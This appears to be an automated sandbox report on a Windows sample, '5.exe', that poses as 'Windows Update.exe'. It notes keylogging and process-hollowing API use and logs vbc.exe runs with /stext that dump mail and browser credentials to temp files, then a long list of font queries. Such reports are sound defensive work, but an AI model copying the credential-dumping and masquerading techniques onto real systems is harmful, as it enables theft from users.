          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: C:\Users\user\Desktop\5.exe; Process created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe"
          Source: C:\Users\user\Desktop\5.exe; Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmp; Binary or memory string: (redProgram Manager
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmp; Binary or memory string: [Program Manager - 12/7/2021 6:30:45 PM]
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmp; Binary or memory string: Program Manager
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmp; Binary or memory string: [Program Manager - X1(r
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmp; Binary or memory string: SProgram Managerl
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmp; Binary or memory string: [Program Manager - 12/7/2021 6:30:45 PM
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: Windows Update.exe, 0000000A.00000000.344460542.0000000000F90000.00000002.00020000.sdmp, Windows Update.exe, 0000000A.00000000.352318705.0000000000F90000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: Windows Update.exe, 0000000A.00000002.386992337.0000000002CDC000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353510834.0000000002CDE000.00000004.00000001.sdmp; Binary or memory string: [Program Manager
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
